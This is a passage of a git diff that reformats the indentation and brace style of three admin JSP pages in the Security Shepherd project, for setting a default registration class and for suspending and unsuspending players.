+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String userName = Encode.forHtml(ses.getAttribute("userName").toString());
-            String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
-            String ApplicationRoot = getServletContext().getRealPath("");
-            boolean showClasses = false;
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
+boolean showClasses = false;
 
-            ResultSet classList = Getter.getClassInfo(ApplicationRoot);
-            try {
-                showClasses = classList.next();
-            } catch (SQLException e) {
-                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
-                showClasses = false;
-            }
+ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+try
+{
+	showClasses = classList.next();
+}
+catch(SQLException e)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+	showClasses = false;
+}
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">Set Default Registration Class</h1>
-    <div id="setDefaultClassDiv" class="entry">
-        <form id="theForm" action="javascript:;">
-            <p>Any user that registers with this instance of Security
-                Shepherd will be automatically assigned to the class group you
-                choose in this form.</p>
-            <input type="hidden" id="csrfToken" value="<%=csrfToken%>"/>
-            <table align="center">
-                <tr>
-                    <td>
-                        <p>Class:</p>
-                    </td>
-                    <td><select id="classId">
-                        <option value="">Unassigned Players</option>
-                        <%
-                            if (showClasses) {
-                                try {
-                                    do {
-                                        String classId = Encode.forHtml(classList.getString(1));
-                                        String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
-                        %>
-                        <option value="<%=classId%>"><%=classYearName%>
-                        </option>
-                        <%
-                                    }
-                                    while (classList.next());
-                                    classList.close();
-                                } catch (SQLException e) {
-                                    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "setDefaultClass: Error occured when manipulating classList: " + e.toString());
-                                    showClasses = false;
-                                }
-                            }
-                        %>
-                    </select></td>
-                </tr>
-                <tr>
-                    <td colspan="2" align="center"><input type="submit"
-                                                          id="submitButton" value="Set to Default"/></td>
-                </tr>
-            </table>
-        </form>
-    </div>
-    <br>
-    <div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
-    <div id="resultDiv" style="display: none;" class="informationBox"></div>
-    <div id="badData"></div>
+	<h1 class="title">Set Default Registration Class</h1>
+	<div id="setDefaultClassDiv" class="entry">
+		<form id="theForm" action="javascript:;">
+			<p>Any user that registers with this instance of Security
+				Shepherd will be automatically assigned to the class group you
+				choose in this form.</p>
+			<input type="hidden" id="csrfToken" value="<%=csrfToken%>" />
+			<table align="center">
+				<tr>
+					<td>
+						<p>Class:</p>
+					</td>
+					<td><select id="classId">
+							<option value="">Unassigned Players</option>
+							<%
+									if(showClasses)
+									{
+										try
+										{
+											do
+											{
+												String classId = Encode.forHtml(classList.getString(1));
+												String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
+												%>
+							<option value="<%=classId%>"><%=classYearName%></option>
+							<%
+											}
+											while(classList.next());
+											classList.close();
+										}
+										catch(SQLException e)
+										{
+											ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "setDefaultClass: Error occured when manipulating classList: " + e.toString());
+											showClasses = false;
+										}
+									}
+									%>
+					</select></td>
+				</tr>
+				<tr>
+					<td colspan="2" align="center"><input type="submit"
+						id="submitButton" value="Set to Default" /></td>
+				</tr>
+			</table>
+		</form>
+	</div>
+	<br>
+	<div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
+	<div id="resultDiv" style="display: none;" class="informationBox"></div>
+	<div id="badData"></div>
 </div>
-<script>
-    $("#theForm").submit(function () {
-        //Get Data
-        var theClass = $("#classId").val();
-        var theCsrfToken = $('#csrfToken').val();
-        //Validation
-        if (theClass == null) {
-            $('#badData').html("<p><strong><font color='red'>All fields are required</font></strong></p>");
-        } else {
-            //Hide&Show Stuff
-            $("#loadingDiv").show("fast");
-            $("#badData").hide("fast");
-            $("#resultDiv").hide("fast");
-            $("#setDefaultClassDiv").slideUp("fast", function () {
-                //The Ajax Operation
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "setDefaultRegistrationClass",
-                    data: {
-                        classId: theClass,
-                        csrfToken: theCsrfToken
-                    },
-                    async: false
-                });
-                $("#loadingDiv").hide("fast", function () {
-                    if (ajaxCall.status == 200) {
-                        //Now output Result Div and Show
-                        $("#resultDiv").html(ajaxCall.responseText);
-                        $("#resultDiv").show("fast");
-                    } else {
-                        $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                        $("#badData").show("slow");
-                    }
-                    console.log("All Done. displaying Menu");
-                    $("#setDefaultClassDiv").slideDown("slow");
-                });
-            });
-        }
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+<script>	
+	$("#theForm").submit(function(){
+		//Get Data
+		var theClass = $("#classId").val();
+		var theCsrfToken = $('#csrfToken').val();
+		//Validation
+		if (theClass == null)
+		{
+			$('#badData').html("<p><strong><font color='red'>All fields are required</font></strong></p>");
+		}
+		else
+		{
+			//Hide&Show Stuff
+			$("#loadingDiv").show("fast");
+			$("#badData").hide("fast");
+			$("#resultDiv").hide("fast");
+			$("#setDefaultClassDiv").slideUp("fast", function(){
+				//The Ajax Operation
+				var ajaxCall = $.ajax({
+					type: "POST",
+					url: "setDefaultRegistrationClass",
+					data: {
+						classId: theClass,
+						csrfToken: theCsrfToken
+					},
+					async: false
+				});
+				$("#loadingDiv").hide("fast", function(){
+					if(ajaxCall.status == 200)
+					{
+						//Now output Result Div and Show
+						$("#resultDiv").html(ajaxCall.responseText);
+						$("#resultDiv").show("fast");
+					}
+					else
+					{
+						$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+						$("#badData").show("slow");
+					}
+					console.log("All Done. displaying Menu");
+					$("#setDefaultClassDiv").slideDown("slow");
+				});
+			});
+		}
+	});
+	</script>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/userManagement/suspendUser.jsp b/src/main/webapp/admin/userManagement/suspendUser.jsp
index 07749a7ce..c4a99de66 100644
--- a/src/main/webapp/admin/userManagement/suspendUser.jsp
+++ b/src/main/webapp/admin/userManagement/suspendUser.jsp
@@ -1,204 +1,234 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: suspendUser.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: suspendUser.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(suspendUser.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(suspendUser.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
 
 //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String userName = Encode.forHtml(ses.getAttribute("userName").toString());
-            String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
-            String ApplicationRoot = getServletContext().getRealPath("");
-            boolean showClasses = false;
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
+boolean showClasses = false;
 
-            ResultSet classList = Getter.getClassInfo(ApplicationRoot);
-            try {
-                showClasses = classList.next();
-            } catch (SQLException e) {
-                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
-                showClasses = false;
-            }
+ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+try
+{
+	showClasses = classList.next();
+}
+catch(SQLException e)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+	showClasses = false;
+}
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">Suspend Player</h1>
-    <div id="suspendDiv" class="entry">
-        <form id="theForm" action="javascript:;">
-            <p>Please select the player that you would like to suspend;</p>
-            <div id="badData"></div>
-            <input type="hidden" id="csrfToken" value="<%=csrfToken%>"/>
-            <table align="center">
-                <tr>
-                    <td>
-                        <p>Class:</p>
-                    </td>
-                    <td><select id="selectClass">
-                        <option value="">Unassigned Players</option>
-                        <%
-                            if (showClasses) {
-                                try {
-                                    do {
-                                        String classId = Encode.forHtml(classList.getString(1));
-                                        String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
-                        %>
-                        <option value="<%=classId%>"><%=classYearName%>
-                        </option>
-                        <%
-                                    }
-                                    while (classList.next());
-                                    classList.first();
-                                } catch (SQLException e) {
-                                    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
-                                    showClasses = false;
-                                }
-                            }
-                        %>
-                    </select></td>
-                </tr>
-                <tr>
-                    <td colspan="2">
-                        <p>Select the player that you want to assign here</p>
-                        <div id="playerSelect">
-                            <center>
-                                <select id='playerId' style='width: 300px;'>
-                                    <%= GetPlayersByClass.playersInOptionTags(Getter.getPlayersByClass(ApplicationRoot, null)) %>
-                                </select>
-                            </center>
-                        </div>
-                    </td>
-                </tr>
-                <tr>
-                    <td>Number of Minutes:</td>
-                    <td><input type="input" style='width: 200px'
-                               id="numberOfMinutes"/></td>
-                </tr>
-                <tr>
-                    <td colspan="2" align="center"><input type="submit"
-                                                          id="submitButton" value="Suspend Player"/></td>
-                </tr>
-            </table>
-        </form>
-    </div>
-    <br>
-    <div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
-    <div id="resultDiv" style="display: none;" class="informationBox"></div>
-    <div id="badData"></div>
+	<h1 class="title">Suspend Player</h1>
+	<div id="suspendDiv" class="entry">
+		<form id="theForm" action="javascript:;">
+			<p>Please select the player that you would like to suspend;</p>
+			<div id="badData"></div>
+			<input type="hidden" id="csrfToken" value="<%=csrfToken%>" />
+			<table align="center">
+				<tr>
+					<td>
+						<p>Class:</p>
+					</td>
+					<td><select id="selectClass">
+							<option value="">Unassigned Players</option>
+							<%
+									if(showClasses)
+									{
+										try
+										{
+											do
+											{
+												String classId = Encode.forHtml(classList.getString(1));
+												String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
+												%>
+							<option value="<%=classId%>"><%=classYearName%></option>
+							<%
+											}
+											while(classList.next());
+											classList.first();
+										}
+										catch(SQLException e)
+										{
+											ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
+											showClasses = false;
+										}
+									}
+											%>
+					</select></td>
+				</tr>
+				<tr>
+					<td colspan="2">
+						<p>Select the player that you want to assign here</p>
+						<div id="playerSelect">
+							<center>
+								<select id='playerId' style='width: 300px;'>
+									<%= GetPlayersByClass.playersInOptionTags(Getter.getPlayersByClass(ApplicationRoot, null)) %>
+								</select>
+							</center>
+						</div>
+					</td>
+				</tr>
+				<tr>
+					<td>Number of Minutes:</td>
+					<td><input type="input" style='width: 200px'
+						id="numberOfMinutes" /></td>
+				</tr>
+				<tr>
+					<td colspan="2" align="center"><input type="submit"
+						id="submitButton" value="Suspend Player" /></td>
+				</tr>
+			</table>
+		</form>
+	</div>
+	<br>
+	<div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
+	<div id="resultDiv" style="display: none;" class="informationBox"></div>
+	<div id="badData"></div>
 </div>
 <script>
-    $("#selectClass").change(function () {
-        var theCsrfToken = $('#csrfToken').val();
-        var ajaxCall = $.ajax({
-            type: "POST",
-            url: "getPlayersByClass",
-            data: {
-                classId: $("#selectClass option:selected").val(),
-                csrfToken: theCsrfToken
-            },
-            async: false
-        });
-        if (ajaxCall.status == 200) {
-            $("#playerSelect").hide("fast", function () {
-                if (ajaxCall.responseText == '') {
-                    $("#playerSelect").html("<p><font color='red'>Sorry, but there are no players in this class</font></p>");
-                } else if (ajaxCall.responseText == 'fail') {
-                    $("#playerSelect").html("<p><font color='red'>Sorry, but an error occured! Please try again!</font></p>");
-                } else {
-                    $("#playerSelect").html("<center><select id='playerId' style='width: 300px'>" + ajaxCall.responseText + "</select><br></center>");
-                }
-                $("#playerSelect").show("slow");
-            });
-        } else {
-            $("#badData").html("<p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-        }
-    });
-
-    $("#theForm").submit(function () {
-        //Get Data
-        var theCsrfToken = $('#csrfToken').val();
-        var theNumberOfMinutes = $('#numberOfMinutes').val();
-        var thePlayers = $("#playerId").val();
-        //Validation
-        if (thePlayers == null) {
-            $('#badData').html("<p><strong><font color='red'>Please select a player to suspend.</font></strong></p>");
-        } else {
-            //Hide&Show Stuff
-            $("#loadingDiv").show("fast");
-            $("#badData").hide("fast");
-            $("#resultDiv").hide("fast");
-            $("#suspendDiv").slideUp("fast", function () {
-                //The Ajax Operation
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "suspendPlayer",
-                    data: {
-                        player: thePlayers,
-                        numberOfMinutes: theNumberOfMinutes,
-                        csrfToken: theCsrfToken
-                    },
-                    async: false
-                });
-                $("#loadingDiv").hide("fast", function () {
-                    if (ajaxCall.status == 200) {
-                        //Now output Result Div and Show
-                        $("#resultDiv").html(ajaxCall.responseText);
-                        $("#resultDiv").show("fast");
-                    } else {
-                        $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                        $("#badData").show("slow");
-                    }
-                    $("#suspendDiv").slideDown("slow");
-                });
-            });
-        }
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	$("#selectClass").change(function () {
+		var theCsrfToken = $('#csrfToken').val();
+		var ajaxCall = $.ajax({
+			type: "POST",
+			url: "getPlayersByClass",
+			data: {
+				classId: $("#selectClass option:selected").val(),
+				csrfToken: theCsrfToken
+			},
+			async: false
+		});
+		if(ajaxCall.status == 200)
+		{
+			$("#playerSelect").hide("fast", function(){
+				if(ajaxCall.responseText == '')
+				{
+					$("#playerSelect").html("<p><font color='red'>Sorry, but there are no players in this class</font></p>");
+				}
+				else if(ajaxCall.responseText == 'fail')
+				{
+					$("#playerSelect").html("<p><font color='red'>Sorry, but an error occured! Please try again!</font></p>");
+				}
+				else
+				{
+					$("#playerSelect").html("<center><select id='playerId' style='width: 300px'>" + ajaxCall.responseText + "</select><br></center>");
+				}
+				$("#playerSelect").show("slow");
+			});
+		}
+		else
+		{
+			$("#badData").html("<p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+		}
+	});
+	
+	$("#theForm").submit(function(){
+		//Get Data
+		var theCsrfToken = $('#csrfToken').val();
+		var theNumberOfMinutes = $('#numberOfMinutes').val();
+		var thePlayers = $("#playerId").val();
+		//Validation
+		if (thePlayers == null)
+		{
+			$('#badData').html("<p><strong><font color='red'>Please select a player to suspend.</font></strong></p>");
+		}
+		else
+		{
+			//Hide&Show Stuff
+			$("#loadingDiv").show("fast");
+			$("#badData").hide("fast");
+			$("#resultDiv").hide("fast");
+			$("#suspendDiv").slideUp("fast", function(){
+				//The Ajax Operation
+				var ajaxCall = $.ajax({
+					type: "POST",
+					url: "suspendPlayer",
+					data: {
+						player: thePlayers,
+						numberOfMinutes: theNumberOfMinutes,
+						csrfToken: theCsrfToken
+					},
+					async: false
+				});
+				$("#loadingDiv").hide("fast", function(){
+					if(ajaxCall.status == 200)
+					{
+						//Now output Result Div and Show
+						$("#resultDiv").html(ajaxCall.responseText);
+						$("#resultDiv").show("fast");
+					}
+					else
+					{
+						$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+						$("#badData").show("slow");
+					}
+					$("#suspendDiv").slideDown("slow");
+				});
+			});
+		}
+	});
+	</script>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/userManagement/unSuspendUser.jsp b/src/main/webapp/admin/userManagement/unSuspendUser.jsp
index 3375c47d4..2f9dfae37 100644
--- a/src/main/webapp/admin/userManagement/unSuspendUser.jsp
+++ b/src/main/webapp/admin/userManagement/unSuspendUser.jsp
@@ -1,196 +1,226 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: unSuspendUser.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: unSuspendUser.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(unSuspendUser.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(unSuspendUser.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
 
 //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String userName = Encode.forHtml(ses.getAttribute("userName").toString());
-            String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
-            String ApplicationRoot = getServletContext().getRealPath("");
-            boolean showClasses = false;
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
+boolean showClasses = false;
 
-            ResultSet classList = Getter.getClassInfo(ApplicationRoot);
-            try {
-                showClasses = classList.next();
-            } catch (SQLException e) {
-                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
-                showClasses = false;
-            }
+ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+try
+{
+	showClasses = classList.next();
+}
+catch(SQLException e)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+	showClasses = false;
+}
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">Cancel Player Suspension</h1>
-    <div id="suspendDiv" class="entry">
-        <form id="theForm" action="javascript:;">
-            <p>Please select the player that you would like unsuspend;</p>
-            <input type="hidden" id="csrfToken" value="<%=csrfToken%>"/>
-            <table align="center">
-                <tr>
-                    <td>
-                        <p>Class:</p>
-                    </td>
-                    <td><select id="selectClass">
-                        <option value="">Unassigned Players</option>
-                        <%
-                            if (showClasses) {
-                                try {
-                                    do {
-                                        String classId = Encode.forHtml(classList.getString(1));
-                                        String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
-                        %>
-                        <option value="<%=classId%>"><%=classYearName%>
-                        </option>
-                        <%
-                                    }
-                                    while (classList.next());
-                                    classList.first();
-                                } catch (SQLException e) {
-                                    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
-                                    showClasses = false;
-                                }
-                            }
-                        %>
-                    </select></td>
-                </tr>
-                <tr>
-                    <td colspan="2">
-                        <p>Select the player that you want to assign here</p>
-                        <div id="playerSelect">
-                            <center>
-                                <select id='playerId' style='width: 300px;'>
-                                    <%= GetPlayersByClass.playersInOptionTags(Getter.getPlayersByClass(ApplicationRoot, null)) %>
-                                </select>
-                            </center>
-                        </div>
-                    </td>
-                </tr>
-                <tr>
-                    <td colspan="2" align="center"><input type="submit"
-                                                          id="submitButton" value="Enable Player"/></td>
-                </tr>
-            </table>
-        </form>
-    </div>
-    <br>
-    <div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
-    <div id="resultDiv" style="display: none;" class="informationBox"></div>
-    <div id="badData"></div>
+	<h1 class="title">Cancel Player Suspension</h1>
+	<div id="suspendDiv" class="entry">
+		<form id="theForm" action="javascript:;">
+			<p>Please select the player that you would like unsuspend;</p>
+			<input type="hidden" id="csrfToken" value="<%=csrfToken%>" />
+			<table align="center">
+				<tr>
+					<td>
+						<p>Class:</p>
+					</td>
+					<td><select id="selectClass">
+							<option value="">Unassigned Players</option>
+							<%
+									if(showClasses)
+									{
+										try
+										{
+											do
+											{
+												String classId = Encode.forHtml(classList.getString(1));
+												String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
+												%>
+							<option value="<%=classId%>"><%=classYearName%></option>
+							<%
+											}
+											while(classList.next());
+											classList.first();
+										}
+										catch(SQLException e)
+										{
+											ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
+											showClasses = false;
+										}
+									}
+											%>
+					</select></td>
+				</tr>
+				<tr>
+					<td colspan="2">
+						<p>Select the player that you want to assign here</p>
+						<div id="playerSelect">
+							<center>
+								<select id='playerId' style='width: 300px;'>
+									<%= GetPlayersByClass.playersInOptionTags(Getter.getPlayersByClass(ApplicationRoot, null)) %>
+								</select>
+							</center>
+						</div>
+					</td>
+				</tr>
+				<tr>
+					<td colspan="2" align="center"><input type="submit"
+						id="submitButton" value="Enable Player" /></td>
+				</tr>
+			</table>
+		</form>
+	</div>
+	<br>
+	<div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
+	<div id="resultDiv" style="display: none;" class="informationBox"></div>
+	<div id="badData"></div>
 </div>
 <script>
-    $("#selectClass").change(function () {
-        var theCsrfToken = $('#csrfToken').val();
-        var ajaxCall = $.ajax({
-            type: "POST",
-            url: "getPlayersByClass",
-            data: {
-                classId: $("#selectClass option:selected").val(),
-                csrfToken: theCsrfToken
-            },
-            async: false
-        });
-        if (ajaxCall.status == 200) {
-            $("#playerSelect").hide("fast", function () {
-                if (ajaxCall.responseText == '') {
-                    $("#playerSelect").html("<p><font color='red'>Sorry, but there are no players in this class</font></p>");
-                } else if (ajaxCall.responseText == 'fail') {
-                    $("#playerSelect").html("<p><font color='red'>Sorry, but an error occured! Please try again!</font></p>");
-                } else {
-                    $("#playerSelect").html("<center><select id='playerId' style='width: 300px'>" + ajaxCall.responseText + "</select><br></center>");
-                }
-                $("#playerSelect").show("slow");
-            });
-        } else {
-            $("#badData").html("<p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-        }
-    });
-
-    $("#theForm").submit(function () {
-        //Get Data
-        var theCsrfToken = $('#csrfToken').val();
-        var thePlayers = $("#playerId").val();
-        //Validation
-        if (thePlayers == null) {
-            $('#badData').html("<p><strong><font color='red'>Please select a player to suspend.</font></strong></p>");
-        } else {
-            //Hide&Show Stuff
-            $("#loadingDiv").show("fast");
-            $("#badData").hide("fast");
-            $("#resultDiv").hide("fast");
-            $("#suspendDiv").slideUp("fast", function () {
-                //The Ajax Operation
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "unSuspendPlayer",
-                    data: {
-                        player: thePlayers,
-                        csrfToken: theCsrfToken
-                    },
